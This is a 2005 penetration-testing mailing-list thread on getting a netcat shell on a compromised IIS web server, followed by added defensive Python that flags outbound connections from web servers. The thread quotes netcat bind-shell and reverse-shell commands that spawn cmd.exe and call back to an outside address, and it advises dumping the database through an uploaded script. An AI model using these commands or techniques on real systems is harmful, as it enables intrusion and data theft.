RE: Netcat Question

From: Meidinger Chris (chris.meidinger@badenit.de)
Date: Wed Jun 01 2005 - 09:43:39 EDT


Hi Intel,

I assume there is a firewall between you and the webserver? That would be
a pretty logical explanation of why you can't access your bindshell.

If I were you, I would upload a script, have that script run locally to dump
the database and place the results in a folder in wwwroot. Then you can pick
it up with your browser.

If you want to get tricky, you should find a couple of .NET applications
that act as browser shells.

But remember: unless you are combined testing incident response and
penetration you *don't* want to trip IDS. Outbound connections from a web
server to a silly internet host on port 8000(!) are a dead giveaway for a
properly tuned IDS or a decent firewall admin. Don't be surprised if you get
blackholed.

Cheers,

Chris

> -----Original Message-----
> From: intel96 [mailto:intel96@bellsouth.net]
> Sent: Wednesday, June 01, 2005 12:39 AM
> To: pen-test@securityfocus.com
> Subject: Netcat Question
>
> To All,
>
> I am conducting a pentest and I have been able to upload netcat to the
> web server (IIS 6.0 - with ports 80/443 open) via ftp. I have tried to
> establish a shell both ways, but cannot get it to work:
>
> On the web server I first tried: nc.exe -l -p 8000 -e cmd.exe
>
> When I tried to connect to port 8000 on the web server I received a
> timeout on my side. I have also tried this with port 53 and it also did
> not work.
>
> I then tried: nc.exe -nv my_public_ip_address 443 -d -e cmd.exe
>
> This did not work either. I did not see the remote system trying to
> connect to my system via my logs. I have access to upload anything to
> the system and run most commands via sql injections. I have
> administrator level access on the system at this time.
>
> Any ideas on how I can get this shell to work? Or are there any other
> commands that may provide me more access or allow me to dump the
> database?
>
> Thanks,
>
> Intel96
>
>
>
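
Added example, not part of the original messages: a minimal defender-side check for the pattern the reply calls a dead giveaway, a web server initiating connections to outside hosts. The log format, addresses and allowlist are constructed assumptions; note that the rule keys on who opened the connection, so destination port 443 is flagged just like 8000.

```python
import re
from ipaddress import ip_address

# Constructed sample in a hypothetical firewall log format (not from the thread):
# timestamp action proto src:sport -> dst:dport tcp-flags
SAMPLE_LOG = """\
2005-06-01T09:12:01 ALLOW TCP 198.51.100.23:51514 -> 10.0.0.5:443 SYN
2005-06-01T09:12:02 ALLOW TCP 10.0.0.5:443 -> 198.51.100.23:51514 SYN-ACK
2005-06-01T09:12:40 ALLOW UDP 10.0.0.5:1037 -> 10.0.0.2:53 -
2005-06-01T09:13:05 DENY TCP 10.0.0.5:1042 -> 203.0.113.7:8000 SYN
2005-06-01T09:14:19 ALLOW TCP 10.0.0.5:1043 -> 203.0.113.7:443 SYN
"""

WEB_SERVERS = {ip_address("10.0.0.5")}            # assumed DMZ web server
ALLOWED_EGRESS = {(ip_address("10.0.0.2"), 53)}   # assumed internal resolver

LINE = re.compile(
    r"(?P<ts>\S+) (?P<action>ALLOW|DENY) (?P<proto>TCP|UDP) "
    r"(?P<src>[\d.]+):(?P<sport>\d+) -> (?P<dst>[\d.]+):(?P<dport>\d+) (?P<flags>\S+)"
)

def find_unexpected_egress(log_text):
    """Return alerts for connections *initiated* by a web server to a
    destination outside the egress allowlist."""
    alerts = []
    for raw in log_text.splitlines():
        m = LINE.fullmatch(raw.strip())
        if not m:
            continue  # skip lines that are not in the expected format
        src, dst = ip_address(m["src"]), ip_address(m["dst"])
        dport = int(m["dport"])
        # Replies to inbound clients carry SYN-ACK; only a bare SYN (or any
        # UDP datagram) counts as the server opening a new conversation.
        initiated = m["proto"] == "UDP" or m["flags"] == "SYN"
        if src in WEB_SERVERS and initiated and (dst, dport) not in ALLOWED_EGRESS:
            alerts.append({"ts": m["ts"], "dst": str(dst), "dport": dport,
                           "blocked": m["action"] == "DENY"})
    return alerts

if __name__ == "__main__":
    for alert in find_unexpected_egress(SAMPLE_LOG):
        print(alert)
```

Denied attempts are reported as well as allowed ones, since a blocked outbound SYN from a web server is still evidence that something on the host tried to call out.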


